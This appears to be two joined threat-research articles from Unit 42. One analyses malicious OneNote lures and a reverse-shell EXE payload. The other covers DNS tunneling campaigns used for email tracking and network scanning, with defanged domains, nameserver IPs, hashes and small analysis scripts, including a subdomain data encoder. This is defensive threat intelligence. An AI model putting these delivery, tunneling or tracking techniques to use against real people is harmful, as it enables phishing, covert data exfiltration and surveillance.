  • Cortex XDR and XSIAM agents help protect against post-exploitation activities using the multi-layer protection approach.
  • The Unit 42 Incident Response team can also be engaged to help with a compromise or to provide a proactive assessment to lower your risk.
Related Unit 42 Topics Microsoft, Phishing

Background

Microsoft OneNote is a digital note-taking application that is part of the Microsoft Office suite. A OneNote file is essentially a digital notebook where people can store various types of information.

Additionally, Microsoft OneNote allows people to embed external files, enabling them to store files such as videos, images or even scripts and executables. However, Microsoft has started blocking embedded objects with certain extensions that are considered dangerous within OneNote files running on Microsoft 365 on Windows.

Even so, attackers often abuse the ability to embed objects by planting malicious payloads. Malicious OneNote samples typically disguise themselves as legitimate notes, often including an image and a button.

Attackers use images to draw people’s attention, and they rely on unsuspecting people clicking buttons to launch malicious payloads. This technique is popular for payload delivery as it leverages people’s trust in legitimate note-taking applications.

Figures 1, 2 and 3 show three different varieties of malicious OneNote samples with different types of embedded images and buttons. By hovering over the fake button, we can see the location and type of the payload planted in the OneNote file.

In Figure 1, the malicious OneNote sample asks the target to click on the view button to see the “protected” document. Upon doing so, a malicious VBScript file executes.

Image 1 is a screenshot of a Microsoft OneNote page with the contents blurred. A popup says OneNote. This document is protected. You have to double click “View” button to open this document. View button. A tooltip when hovering over the View button reads File: press to unblock document.vbs. Size: 88.9 KB.
Figure 1. OneNote sample with embedded malicious VBS.

Similarly, Figures 2 and 3 show malicious OneNote documents with fake buttons that entice victims to execute an embedded EXE payload and an Office 97-2003 payload, respectively.

Image 2 is a screenshot of Microsoft OneNote. Blue CLICK TO VIEW DOCUMENT button. A tooltip when hovering over the View button reads File: cc.EXE. Size: 734 KB.
Figure 2. OneNote sample with embedded malicious EXE file.
Image 3 is a screenshot of a Microsoft OneNote page with the contents blurred. Purple text in all-caps reads SECURED ONENOTE DOCUMENT. Purple Click To View Document button. A tooltip when hovering over the View Document button reads File: Floor_Drawingshta.Doc. Size: 1.39 KB.
Figure 3. OneNote sample with embedded malicious Office 97-2003 file.

Methodology

As mentioned above, attackers mostly abuse OneNote files for malicious payload delivery. To do so, they tend to embed a few specific payload types such as the following:

  • JavaScript
  • VBScript
  • PowerShell
  • HTML application (HTA)

Despite the different file types, these payloads often show similar behaviors and aim to achieve the same malicious objectives. However, we won't delve into the entire attack and infection chain, as we have covered this in a previous article on malicious OneNote attachments.

The telltale sign of a malicious OneNote file is the presence of embedded objects. While benign OneNote files can also contain embedded objects, malicious OneNote files almost invariably include them.

According to Microsoft, files embedded in OneNote start with a specific globally unique identifier (GUID) tag:

  • {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC}

This GUID indicates the presence of a FileDataStoreObject object. The GUID is then followed by the size of the embedded file.

The actual embedded file follows 20 bytes after the aforementioned GUID tag and will be as long as the defined size. For example, in Figure 4 below:

  • Box 1 represents the embedded object GUID tag
  • Box 2 indicates the size of the embedded object
  • Box 3 represents the actual embedded object
Image 4 is a screenshot of embedded objects in a OneNote file. Three different areas are highlighted in red and labeled 1, 2, 3.
Figure 4. Identification of embedded objects in a OneNote file.
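
The layout described above (GUID tag, size, then the embedded file 20 bytes after the tag) can be walked with a few lines of Python. This is a minimal sketch rather than the tooling used for this research. It assumes the GUID is stored in the usual mixed-endian on-disk form and that the size is an 8-byte little-endian integer immediately after the tag; the function name is hypothetical.

```python
import struct
import uuid
from typing import List

# On-disk (mixed-endian) byte form of the FileDataStoreObject GUID tag.
GUID_TAG = uuid.UUID("{BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC}").bytes_le
GAP_AFTER_TAG = 20  # the embedded file starts 20 bytes after the GUID tag


def extract_embedded_objects(data: bytes) -> List[bytes]:
    """Return every embedded object found in the raw bytes of a .one file."""
    payloads = []
    pos = data.find(GUID_TAG)
    while pos != -1:
        size_off = pos + len(GUID_TAG)
        data_off = size_off + GAP_AFTER_TAG
        if data_off > len(data):
            break  # truncated file: not enough bytes left for the size field
        # Assumption: the size is an 8-byte little-endian integer.
        (size,) = struct.unpack_from("<Q", data, size_off)
        if data_off + size <= len(data):
            payloads.append(data[data_off:data_off + size])
        pos = data.find(GUID_TAG, pos + 1)
    return payloads


if __name__ == "__main__":
    # Synthetic blob standing in for a OneNote file with one embedded object.
    blob = (
        b"header" + GUID_TAG + struct.pack("<Q", 5) + b"\x00" * 12
        + b"hello" + b"trailer"
    )
    print(extract_embedded_objects(blob))
```

Once extracted, each payload can be typed by its leading bytes or content (for example, an MZ header for EXE files) to produce a breakdown by payload type.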

Payload Types and Average Size Distribution

As illustrated in Figure 5, attackers predominantly use the following seven file types for their OneNote payloads:

  • PowerShell
  • VBScript
  • Batch
  • HTA
  • Office 97-2003
  • EXE
  • JavaScript (this file type is the most commonly used)
Image 5 is a pie chart of the types of payloads in the malicious files. The largest amount is JavaScript at 46.6%, followed by PowerShell at 33.7%. Next is Batch at 8.2%, followed in increasingly smaller amounts by VBScript, Office 97-2003, HTA and EXE.
Figure 5. Distribution of payload types embedded in malicious OneNote files.

We also extracted and noted the size of each payload type, as shown in Figure 6.

Image 6 is a column chart showing the distribution of payload type by size with EXE the largest at over 1,000 KB. The second largest is Office 97-2003. VBScript, Batch, PowerShell, HTA and JavaScript are all much smaller at under 50 KB.
Figure 6. Average sizes of payloads found in malicious OneNote samples grouped by payload type.

While larger binary embedded payloads such as EXE and Office 97-2003 are more capable, attackers tend to use them less often (as shown in Figure 5) because they increase the overall size of the OneNote sample. Attackers tend to prefer a smaller overall file size, as smaller-sized malware is easier to include in common malware delivery mechanisms such as email attachments, thus raising less suspicion.

As illustrated in Figure 6 above, embedded malicious EXE and Office 97-2003 file payloads tend to be larger, and embedded malicious HTA and JavaScript files tend to be smaller.

Presence of Images in Malicious OneNote Samples

Attackers creating malicious OneNote lures use images that look like buttons to trick people into launching harmful payloads. We mapped out the number of images in each malicious OneNote sample with the payload type, and then calculated the median number of images.

In analyzing the 6,000 samples in our dataset, we found that all but three (99.9%) of the malicious OneNote samples contained at least one image. Since almost all of the samples contain at least one image, we can confirm our hypothesis that OneNote samples are primarily used as phishing vehicles.

Figure 7 shows that the median number of images per payload type is two. For instance, attackers could use both a fake button and an attention-grabbing image like a fake “secure” document banner to make their phishing campaign more believable (such as in Figure 3).

Image 7 is a column chart of the median image count for different payload types. JavaScript, PowerShell and Batch are nearly even and the highest amount at 3. VBScript, HTA, EXE and Office 97-2003 are smaller at 2.
Figure 7. Median image count for different payload types embedded in OneNote malware grouped by payload type.

The chart above demonstrates that two to three images typically accompany payloads in malicious OneNote samples, some used to make the document more believable and some serving as fake buttons.

Analysis of an Embedded EXE Payload

While our previous research examined OneNote samples that carry the more common and popular payload types, such as PowerShell or HTA, EXE payloads have gotten less attention. In this section, we will analyze a OneNote sample with an embedded EXE payload.

The payload below is extracted from a OneNote sample with the following SHA256 hash:

  • d48bcca19522af9e11d5ce8890fe0b8daa01f93c95e6a338528892e152a4f63c

The payload itself has the following SHA256 hash:

  • 92d057720eab41e9c6bb684e834da632ff3d79b1d42e027e761d21967291ca50

Figure 8 shows our analysis of the EXE payload in IDA Pro. We found a handful of code blocks, which often signal that we might be dealing with shellcode.

Our assumption was confirmed by two findings: a reference to GS:60, which points to the Process Environment Block (PEB), and the use of the rotate right (ROR) instruction. Together, these indicate that the malware is using dynamic address resolution for functions and hashing for function identification.

Image 8 is a diagram of the EXE payload opened in the disassembler IDA Pro. Red rectangles home in on the different instructions within the architecture.
Figure 8. EXE payload opened in IDA.
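
To illustrate why a ROR instruction hints at hashed function names, the sketch below implements a rotate-right based name hash of the kind often seen in public shellcode. This is an assumption for illustration only: the article does not state the rotation count or the exact routine used by this sample, and the rotation by 13 bits and the names ror32 and ror13_hash are hypothetical choices.

```python
def ror32(value: int, count: int) -> int:
    """Rotate a 32-bit value right by count bits."""
    count %= 32
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def ror13_hash(name: str) -> int:
    """Hash an export name by rotating the accumulator and adding each byte.

    Assumption: a 13-bit rotation, which is common in public shellcode but
    not confirmed for the sample analyzed here.
    """
    acc = 0
    for byte in name.encode("ascii"):
        acc = ror32(acc, 13)
        acc = (acc + byte) & 0xFFFFFFFF
    return acc
```

Shellcode using this approach walks the export tables of loaded modules (located through the PEB), hashes each export name and compares the result with a hard-coded constant, so no function name strings need to appear in the payload.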

To get an understanding of the objective of the shellcode and identify the libraries it was dynamically loading, we opened it in the x64dbg debugger. We then put a breakpoint at the function that repeatedly calls the loc_140004021 function block in a loop, as shown in Figure 9.

Image 9 is a screenshot of highlighted functions that were dynamically loaded. A blue arrow points to a row highlighted in grey.
Figure 9. Breakpoint set to identify the functions that are being dynamically loaded.

The combination of the WSAStringToAddressA function (shown in Figure 10) and the WSASocketW function (shown in Figure 11) makes it clear that the shellcode is attempting to send or receive data by establishing a network socket.

Image 10 is a screenshot of recorded function WSAStringToAddressA highlighted in the RSI register. It is indicated by two blue arrows as well as a red rectangle. The lower indicated line is highlighted in grey.
Figure 10. Function name WSAStringToAddressA recorded in the RSI register.
Image 11 is a screenshot of recorded function WSASocketW highlighted in the RSI register. It is indicated in a red rectangle. Lower down, a line is highlighted in grey and indicated by a blue arrow.
Figure 11. Function name WSASocketW recorded in the RSI register.

Since reverse TCP shells are the most common type of shellcode used for connecting back to the attacker's machine, we set up breakpoints in ws2_32.dll (shown in Figure 12) to determine whether the connect function is called. And if so, we could extract the arguments passed down to it. These arguments often have the IP address and port number to which the payload attempts to connect.

Image 12 is a screenshot of the breakpoints for ws2_32.dll. A line in left pane is highlighted in grey. Two addresses in the right pane are highlighted in red.
Figure 12. Breakpoint set at function connect in ws2_32.dll.

As expected, the shellcode stopped at the connect function call. Upon dumping the values of the RDX register, we were able to identify the contents of the sockaddr_in struct, as shown in Figure 13.

Image 13 is a screenshot of the contents of sockaddr_in highlighted in a red rectangle on the lower left of the screenshot.
Figure 13. Content of sockaddr_in struct dump.

As shown in Figure 14, we then wrote a Python script to unpack the content of the sockaddr_in structure identified above.

Image 14 is a screenshot of Python code unpacking sockaddr_in contents.
Figure 14. Python script unpacking content of sockaddr_in struct.

Executing the above Python script gave us the output shown in Figure 15, indicating that the payload connects to a local machine on port 4444, potentially an attacker-controlled machine.

Image 15 is a screenshot of Python script that contains the IP address and port, labeled in lines 2 and 3 of the image.
Figure 15. IP address and port the payload is connecting to.
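
The unpacking step described above can be sketched as follows. This is not the script from Figure 14. It assumes the standard 16-byte sockaddr_in layout (a 2-byte address family in host order, a 2-byte port in network order, a 4-byte IPv4 address and 8 bytes of padding). The sample bytes and the address 192.168.1.10 are placeholders, not values taken from the analyzed payload.

```python
import socket
import struct


def parse_sockaddr_in(raw: bytes):
    """Unpack a 16-byte sockaddr_in dump into (family, ip, port)."""
    if len(raw) < 16:
        raise ValueError("sockaddr_in is 16 bytes long")
    (family,) = struct.unpack_from("<H", raw, 0)  # sin_family, little-endian on x64
    (port,) = struct.unpack_from("!H", raw, 2)    # sin_port, network byte order
    ip = socket.inet_ntoa(raw[4:8])               # sin_addr, network byte order
    return family, ip, port


# Placeholder dump: AF_INET (2), port 4444 (0x115c), address 192.168.1.10.
sample = bytes.fromhex("0200115cc0a8010a0000000000000000")
family, ip, port = parse_sockaddr_in(sample)
print(family, ip, port)
```

The port is stored big-endian, which is why the bytes 11 5c in a memory dump correspond to port 4444.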

Conclusion

We conclude that OneNote as an attack vector is more versatile than we initially thought. It can carry executable payloads, in addition to script-based downloaders. Also, as with many other file types, attackers can use it for lateral movement.

When embedding malicious payloads inside OneNote files, attackers mainly leverage JavaScript, PowerShell, Batch and VBScript. However, attackers occasionally use binary payloads such as executables or even Office 97-2003 files to achieve their objectives.

Organizations can consider blocking embedded payloads with dangerous extensions within OneNote files to protect their users against such attacks. More broadly, we recommend people limit their exposure by checking the embedded payload filenames and extensions in OneNote files by hovering over any buttons or images before clicking them.

Palo Alto Networks customers are better protected from the threats discussed above through the following products:

  • Next-Generation Firewall with cloud-delivered security services including WildFire.
  • Prisma Access devices with cloud-delivered security services including WildFire.
  • Cortex XDR and XSIAM agents help protect against post-exploitation activities using the multi-layer protection approach.
  • The Unit 42 Incident Response team can also be engaged to help with a compromise or to provide a proactive assessment to lower your risk.

Indicators of Compromise

The following are links to our GitHub repository containing file hashes for the OneNote files and payloads discovered during our research for this article.

Leveraging DNS Tunneling for Tracking and Scanning

Executive Summary

This article presents a case study on new applications of domain name system (DNS) tunneling we have found in the wild. These techniques expand beyond DNS tunneling only for command and control (C2) and virtual private network (VPN) purposes.

Malicious actors occasionally employ DNS tunneling as a covert communications channel, because it can bypass conventional network firewalls. This allows C2 traffic and data exfiltration that can remain hidden from some traditional detection methods.

However, we recently detected three campaigns using DNS tunneling for purposes outside of traditional C2 and VPN use: scanning and tracking. In scanning, adversaries employ DNS tunneling to scan a victim's network infrastructure and gather information useful for future attacks. In tracking, adversaries use DNS tunneling techniques to track delivery of malicious emails and monitor the use of Content Delivery Networks (CDN).

This article provides a detailed case study that reveals how adversaries have used DNS tunneling for both scanning and tracking. We aim to increase awareness of these new use cases and provide further insight that can help security professionals better protect their networks.

We have built a system to monitor for DNS tunneling, and this detection is embedded in our DNS Security solution. Palo Alto Networks Next-Generation Firewall customers can access this through our DNS Security subscription to help secure their environment against this malicious activity. Customers also receive protection from the threats discussed here through the Advanced URL Filtering subscription.

  • Cortex XDR customers receive protection against the DNS tunneling techniques mentioned in this article through our Cortex XDR Analytics Engine.
  • Advanced WildFire machine-learning models and analysis techniques have been reviewed and updated in light of the IoCs shared in this research.
  • Prisma Cloud protects cloud environments against DNS tunneling techniques mentioned in this article.
  • If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team.
Related Unit 42 Topics DNS Tunneling, DNS Security

DNS Tunneling

DNS tunneling embeds information into DNS requests and responses in a manner that allows a compromised host to communicate through DNS traffic with a nameserver controlled by an attacker. An example is illustrated below in Figure 1.

A typical use case for DNS tunneling includes the following steps:

  • Attackers first register a domain malicious[.]site and then establish a C2 server that uses DNS tunneling as a communication channel. Attackers have many options to set up this C2 channel, such as by abusing Cobalt Strike.
  • Attackers can create, develop or acquire malware that communicates with the server as a client and send this malware to a compromised client machine.
  • The compromised machine is usually behind a firewall and cannot directly communicate with attackers’ servers. However, the malware can encode the data into the subdomain of malicious[.]site and make a DNS query toward the DNS resolver, as shown in Figure 1.
  • Due to the unique nature of tunneling fully qualified domain names (FQDNs), the DNS resolver cannot find corresponding records from its cache. As a result, the resolver will then conduct recursive DNS queries toward root nameservers, top-level domain (TLD) nameservers and attacker-controlled authoritative nameservers for this domain.
  • Attackers can decode the data carried in the DNS queries and manipulate the DNS response to infiltrate malicious data to the client.
Image 1 is a diagram of how data exfiltration and infiltration work with DNS tunneling. The client server communicates with the DNS resolver. Icon for read/write from the cache. From the DNS resolver the addresses communicate with the root name servers, the top level domain name servers and the authoritative name servers.
Figure 1. An overview of data exfiltration and infiltration with DNS tunneling.
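
The encoding step in this flow can be illustrated with a short sketch, which also shows why every tunneling FQDN is unique and therefore misses the resolver cache. Base32 is an assumption chosen for illustration, since attackers typically use their own customized encodings. The domain tunnel.example and the function names are placeholders.

```python
import base64

MAX_LABEL = 63   # maximum length of a single DNS label
MAX_FQDN = 253   # maximum length of a full domain name


def encode_fqdn(data: bytes, domain: str) -> str:
    """Pack data into subdomain labels in front of the given domain."""
    text = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    labels = [text[i:i + MAX_LABEL] for i in range(0, len(text), MAX_LABEL)]
    fqdn = ".".join(labels + [domain])
    if len(fqdn) > MAX_FQDN:
        raise ValueError("payload too large for one DNS query")
    return fqdn


def decode_fqdn(fqdn: str, domain: str) -> bytes:
    """Recover the data from a queried FQDN, as a nameserver or analyst would."""
    prefix = fqdn[: -(len(domain) + 1)]
    text = prefix.replace(".", "").upper()
    text += "=" * (-len(text) % 8)  # restore the stripped Base32 padding
    return base64.b32decode(text)
```

For defenders, the same decoding logic is useful when reviewing resolver logs: long, high-variety subdomains under a single domain that decode cleanly are a strong sign of tunneling.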

How Is DNS Tunneling Hidden?

DNS tunneling is hidden due to three factors.

  • Traditional firewalls can reject unauthorized traffic. However, DNS traffic over User Datagram Protocol (UDP) port 53 is ubiquitous and commonly allowed through firewalls and other network security measures.
  • DNS tunneling is conducted via a logical channel between the compromised client and the attacker’s server, with the implementation of DNS protocol. That means the client machine does not communicate with the attacker's server directly, adding another layer of obscurity.
  • Attackers typically encode data sent during exfiltration and infiltration with their own customized methods, which disguises the data within seemingly legitimate DNS traffic.

How Do Adversaries Leverage DNS Tunneling?

The use of DNS tunneling for C2 purposes enables attackers to establish stealthy and resilient communication channels, facilitating malicious activities such as data exfiltration and infiltration. Well-known campaigns such as DarkHydrus, OilRig, xHunt, SUNBURST and Decoy Dog leverage DNS tunneling for C2.

The DNS record types used by attackers include:

  • IPv4 (A)
  • IPv6 (AAAA)
  • Mail exchange (MX)
  • Canonical name (CNAME)
  • Text (TXT) records

Some VPN vendors also use DNS tunneling for legitimate purposes, such as bypassing firewalls to avoid internet censorship or network service charges.

In addition to C2 and VPN purposes, attackers can also use DNS tunneling for tracking and scanning, as we’ve observed in recent tunneling campaigns.

  • DNS tunneling for tracking:
    • Attackers can track victims’ activities with regard to spam, phishing or advertisement contents. They do so by delivering malicious domains to victims with their identity information encoded in subdomain payloads.
  • DNS tunneling for scanning:
    • Attackers can scan network infrastructure by encoding the IP address and timestamp in the tunneling payloads, with spoofed source IP addresses. Then, the attackers are able to discover open resolvers so that they can exploit resolver vulnerabilities to perform DNS attacks – which can lead to malicious redirection or denial of service.

To better understand these two new use cases, our next sections cover the campaigns we have discovered using DNS tunneling for tracking and for scanning.

DNS Tunneling for Tracking

To track a victim's behavior in conventional C2 communications, a threat actor's malware embeds data from a user's actions in URLs that it transmits to a C2 server through web traffic. In DNS tunneling, attackers accomplish the same result by using subdomains in DNS traffic.

In this application of DNS tunneling, an attacker's malware embeds information on a specific user and that user's actions into a unique subdomain of a DNS query. This subdomain is the tunneling payload, and the DNS query for the FQDN uses an attacker-controlled domain.

An authoritative nameserver for the attacker-controlled domain receives the DNS query. This attacker-controlled nameserver stores all DNS queries for the domain. The unique subdomains and timestamps of these DNS queries provide a log of the victim's activity. This is not limited to a single victim, and attackers can use it to track multiple victims from their campaign.

TrkCdn DNS Tunneling Campaign

We call this campaign "TrkCdn" due to the characteristics of the domain names used for its DNS tunneling. Based on our analysis, we believe the DNS tunneling technique used in the TrkCdn campaign is meant to track a victim's interaction with its email content. Our data indicates the attacker targeted 731 potential victims. This campaign used 75 IP addresses for nameservers, resolving 658 attacker-controlled domains.

Each domain only uses a single nameserver IP address, while one nameserver IP address can serve up to 123 domains. These domains use the same DNS configurations and the same encoding method for their subdomains. The attacker registered all domains under [.]com or [.]info TLDs and set domain names by combining two or three root words, which is a practice attackers use to avoid domain generation algorithm (DGA) detection.

A subset of these domains are as follows:

  • simitor[.]com
  • vibnere[.]com
  • edrefo[.]com
  • pordasa[.]info
  • vitrfar[.]info
  • frotel[.]info

A list of these domains along with sample FQDNs, nameservers, nameserver IP addresses and registration dates is shown below in Table 1. Because this campaign leveraged DNS tunneling only under the trk subdomain and configured a CNAME record under the cdn subdomain, we named this campaign TrkCdn.

Domain | Sample FQDN | Nameservers | Nameserver IP Address | Registration Date
simitor[.]com | 04b16bbbf91be3e2fee2c83151131cf5.trk.simitor[.]com | ns1.simitor[.]com, ns2.simitor[.]com | 193.9.114[.]43 | July 6, 2023
vibnere[.]com | a8fc70b86e828ffed0f6b3408d30a037.trk.vibnere[.]com | ns1.vibnere[.]com, ns2.vibnere[.]com | 193.9.114[.]43 | June 14, 2023
edrefo[.]com | 6e4ae1209a2afe123636f6074c19745d.trk.edrefo[.]com | ns1.edrefo[.]com, ns2.edrefo[.]com | 193.9.114[.]43 | July 26, 2023
pordasa[.]info | 2c0b9017cf55630f1095ff42d9717732.trk.pordasa[.]info | ns1.pordasa[.]info, ns2.pordasa[.]info | 172.234.25[.]151 | Oct. 11, 2022
vitrfar[.]info | 0fa17586a20ef2adf2f927c78ebaeca3.trk.vitrfar[.]info | ns1.vitrfar[.]info, ns2.vitrfar[.]info | 172.234.25[.]151 | Nov. 21, 2022
frotel[.]info | 50e5927056538d5087816be6852397f6.trk.frotel[.]info | ns1.frotel[.]info, ns2.frotel[.]info | 172.234.25[.]151 | Nov. 21, 2022

Table 1. A subset of the domains used in the TrkCdn campaign.

Tracking Mechanism

We believe the DNS tunneling technique used in the TrkCdn campaign is meant to track a victim's interaction with its email content. Analysis of DNS traffic for simitor[.]com reveals how attackers could achieve this.

Here, we only show the tracking-relevant DNS configurations used by this tunneling domain. The same IP address, 193.9.114[.]43, served the root domain, the nameservers and cdn.simitor[.]com. This behavior is a common indicator for tunneling domains, because attackers need to run their own nameserver while also trying to keep attack costs low. Therefore, they typically use a single IP address for both domain hosting and the nameserver.

All *.trk.simitor[.]com are redirected to cdn.simitor[.]com via a wildcard DNS record as shown below.

For the TrkCdn campaign, MD5 hash values represent email addresses in the DNS traffic. These MD5 values are subdomains for the DNS queries of a tunneling payload. For example, an email address of unit42@not-a-real-domain[.]com has an MD5 value of 4e09ef9806fb9af448a5efcd60395815. Therefore, the FQDN of a DNS query for the tunneling payload would be 4e09ef9806fb9af448a5efcd60395815.trk.simitor[.]com.

DNS queries for these FQDNs can act as a tracking mechanism for emails sent by the threat actor. For example, if a victim opens one of these emails, embedded content might automatically generate the DNS query, or a victim could click on a link within the email. However this happens, after an infected host generates a DNS query for the FQDN, the DNS resolver will contact the IP address for the authoritative nameserver of the FQDN. Due to its wildcard configuration, the victim's DNS resolver would obtain the following result:

Hence, even though the FQDNs vary across different targets, they are all forwarded to the same IP address used by cdn.simitor[.]com. This authoritative nameserver then returns a DNS result that leads to an attacker-controlled server that delivers attacker-controlled content. This content can include advertisements, spam or phishing content.

For tracking purposes, attackers can query DNS logs from their authoritative nameservers and compare the payload with the hash values of the email addresses. This way, attackers can know when a specific victim opens one of their emails or clicks on a link, and they can monitor campaign performance.
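
The matching step can be sketched from a defender's point of view, for example to check which internal addresses appear as tracking payloads in resolver logs. This is a minimal sketch under stated assumptions: the MD5 is computed over the address string exactly as written (any normalization the attackers apply is unknown), and the zone trk.example.com, the sample addresses and the function names are placeholders.

```python
import hashlib


def build_tracking_fqdn(email: str, zone: str) -> str:
    """Build the FQDN whose first label is the MD5 of an email address."""
    # Assumption: the address is hashed as-is, encoded as UTF-8.
    digest = hashlib.md5(email.encode("utf-8")).hexdigest()
    return f"{digest}.{zone}"


def match_queries(queried_fqdns, emails, zone):
    """Map each known email address to the logged queries that encode it."""
    lookup = {hashlib.md5(e.encode("utf-8")).hexdigest(): e for e in emails}
    suffix = "." + zone
    hits = {}
    for fqdn in queried_fqdns:
        name = fqdn.rstrip(".").lower()
        if not name.endswith(suffix):
            continue  # query is for an unrelated zone
        label = name[: -len(suffix)]
        if label in lookup:
            hits.setdefault(lookup[label], []).append(fqdn)
    return hits
```

Because MD5 is deterministic, anyone holding the list of candidate addresses can reverse the mapping with a simple dictionary lookup, which is all the attackers need for campaign tracking.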

For example, a graph showing the cumulative distribution function (CDF) of DNS queries for FQDNs from the TrkCdn campaign is shown below in Figure 2. This graph shows the total percentage of DNS queries for TrkCdn FQDNs from 0 to 30 days. The graph indicates that approximately 80% of victims view the campaign's emails only once, while an additional 10% view the messages again within approximately one week. Attackers can view this FQDN data from their authoritative nameservers in the same manner.

Image 2 is a graph of the life cycle of a specific domain. The horizontal axis measures the days and the vertical axis measures the percentage.
Figure 2. The CDF of FQDN span days in the TrkCdn campaign.
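
A CDF like the one in Figure 2 can be computed from the first and last query dates observed for each FQDN. The sketch below is an illustration, not the analysis code behind the figure. The function name span_days_cdf and the sample dates are hypothetical.

```python
from datetime import date


def span_days_cdf(first_last_pairs):
    """Return (span_in_days, cumulative_fraction) points for FQDN query spans.

    Each input pair holds the first and last date an FQDN was queried.
    A span of 0 means all queries for that FQDN fell on a single day.
    """
    spans = sorted((last - first).days for first, last in first_last_pairs)
    total = len(spans)
    return [
        (day, sum(1 for s in spans if s <= day) / total)
        for day in sorted(set(spans))
    ]


# Hypothetical observations: four FQDNs queried on one day only, one re-queried a week later.
observations = [(date(2023, 7, 10), date(2023, 7, 10))] * 4
observations.append((date(2023, 7, 10), date(2023, 7, 17)))
print(span_days_cdf(observations))
```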

Domain Lifecycle

By investigating an older domain pordasa[.]info, we conclude that the TrkCdn domain lifecycle goes through four distinct phases. These four phases are as follows:

  • Incubation phase (two to 12 weeks)
    • After the domain registration, attackers only configure the DNS settings and do nothing else, attempting to avoid malicious newly registered domain detection.
  • Active phase (two to three weeks)
    • Attackers actively distribute thousands of FQDNs to the corresponding victims’ email addresses.
  • Tracking phase (nine to 11 months)
    • Victims query the FQDNs, while attackers track their behaviors by obtaining DNS logs.
  • Retirement phase (one year after registration)
    • Attackers typically stop updating the domain registration after one year.

Below, Figure 3 shows an example of this lifecycle for pordasa[.]info. An attacker used this domain for DNS tunneling-style tracking, originally registering it on Oct. 12, 2022.

Image 3 is a graph of the life cycle of a specific domain. The incubation phase lasts 60 days. The active phase starts shortly after. The tracking phase extends to day 270 and the domain registration ends and the retirement phase starts on day 360.
Figure 3. The lifecycle of the pordasa[.]info domain.

TrkCdn Persistence

Until February 2024, we found adversaries using new IP addresses and registering new domains for their authoritative nameservers associated with TrkCdn activity. Attackers registered these domains between Oct. 19, 2020, and Jan. 2, 2024. We analyze the timeline of domain registration and the domain's first use across different IP addresses.

Figure 4 tracks the use of TrkCdn domains associated with 75 IP addresses. As noted in Figure 4, the majority of IP addresses used for TrkCdn's authoritative nameservers lie within the 185.121.0[.]0/16 or the 146.70.0[.]0/16 subnets. This indicates that the threat actor behind TrkCdn tends to use specific hosting providers.

Image 4 is a timeline of domain registration (blue dots) and domain first use (red dots). The horizontal axis shows the timeline, which covers November 2020 through April 2024. The vertical axis shows the IP address. There are many clusters starting in late 2023 and extending into April.
Figure 4. The timeline of TrkCdn domain registration and usage across different IP addresses.

SpamTracker DNS Tunneling Campaign

Our second example is a campaign using DNS tunneling to track spam delivery. Because this campaign uses DNS tunneling for spam tracking, we have nicknamed this campaign "SpamTracker."

This campaign uses a tracking mechanism similar to that of the TrkCdn campaign. It is related to 44 tunneling domains whose authoritative nameservers share the IP address 35.75.233[.]210.

These domains share a common DGA naming method and subdomain encoding method. Nameservers for the A records of these domains are hosted on IP addresses that fall into the 103.8.88[.]64/27 subnet. This campaign originated from Japan, and most of the targets were part of educational institutions.

This campaign employs emails and website links to deliver spam and phishing content that covers the following subjects:

  • Fortune-telling services
  • Fake package delivery updates
  • Secondary job offers
  • Lifetime free items

Figure 5 shows an example of these emails. The intent of the campaign is to lure victims to click on the links behind which threat actors have concealed their payload in the subdomains.

Image 5 is a screenshot of a SpamTracker campaign. The lines alternate in Japanese characters and English translations.
Figure 5. An email example (and English translation) used in the SpamTracker campaign.

Victims will be redirected to websites containing fraudulent information, such as the fortune-telling services shown in Figure 6.

Image 6 is a screenshot of a fake fortune-telling website. The English title is Jewel Ring. There are Japanese and Chinese characters used on multiple lines.
Figure 6. A fake fortune-telling website in the SpamTracker campaign.

Table 2 lists six domains from this campaign along with an example of FQDNs, the nameservers, nameserver IP addresses and registration times.

Domain | Sample FQDN | Nameservers | Nameserver IP Address | Registration Time
wzbhk2ccghtshr[.]com | 21pwt2otx07d3et.wzbhk2ccghtshr[.]com | ns01.wzbhk2ccghtshr[.]com, ns02.wzbhk2ccghtshr[.]com | 35.75.233[.]210 | May 15, 2023
epyujbhfhbs35j[.]com | y0vkmu2eh896he7.epyujbhfhbs35j[.]com | ns01.epyujbhfhbs35j[.]com, ns02.epyujbhfhbs35j[.]com | 35.75.233[.]210 | May 15, 2023
8egub9e7s6cz7n[.]com | q8udswcmvznk34q.8egub9e7s6cz7n[.]com | ns01.8egub9e7s6cz7n[.]com, ns02.8egub9e7s6cz7n[.]com | 35.75.233[.]210 | May 15, 2023
hjmpfsamfkj5m5[.]com | run0ibnpq8r34dj.hjmpfsamfkj5m5[.]com | ns01.hjmpfsamfkj5m5[.]com, ns02.hjmpfsamfkj5m5[.]com | 35.75.233[.]210 | May 15, 2023
uxjxfg2ui8k5zk[.]com | vfct3phbmc8qsx2.uxjxfg2ui8k5zk[.]com | ns01.uxjxfg2ui8k5zk[.]com, ns02.uxjxfg2ui8k5zk[.]com | 35.75.233[.]210 | May 15, 2023
cgb488dixfxjw7[.]com | htujn1rhh3553tc.cgb488dixfxjw7[.]com | ns01.cgb488dixfxjw7[.]com, ns02.cgb488dixfxjw7[.]com | 35.75.233[.]210 | May 15, 2023

Table 2. The list of the domains used in the SpamTracker campaign.

DNS Tunneling for Scanning

Network scanning, which seeks vulnerabilities within network infrastructures, is usually the first stage of cyberattacks. However, the use case of DNS tunneling for network scanning is understudied. As a result, uncovering the scanning applications of tunneling campaigns can help us prevent cyberattacks at an early stage, mitigating potential damage.

SecShow DNS Tunneling Campaign

We found a new campaign in which threat actors leverage tunneling to periodically scan a victim's network infrastructure, and then they typically perform reflection attacks. Their malicious actions include the following:

  • Seeking open resolvers
  • Testing resolver delays
  • Exploiting resolver vulnerabilities
  • Obtaining time-to-live (TTL) information

This campaign generally targets open resolvers. As a result, we find victims mainly come from education, high tech and government fields, where open resolvers are commonly found. This campaign contains three domains, leveraging various subdomains to achieve different types of network scanning.

We list these three domains along with examples of FQDNs, nameservers, nameserver IP addresses and registration times in Table 3. These domains share the nameserver IP address of 202.112.47[.]45. We named this campaign "SecShow" due to the domain names the attackers used.

Domain | Sample FQDN | Nameservers | Nameserver IP Address | Registration Time
secshow[.]net | 6a134b4f-1.c.secshow[.]net | ns1.c.secshow[.]net., ns2.c.secshow[.]net. | 202.112.47[.]45 | July 27, 2023
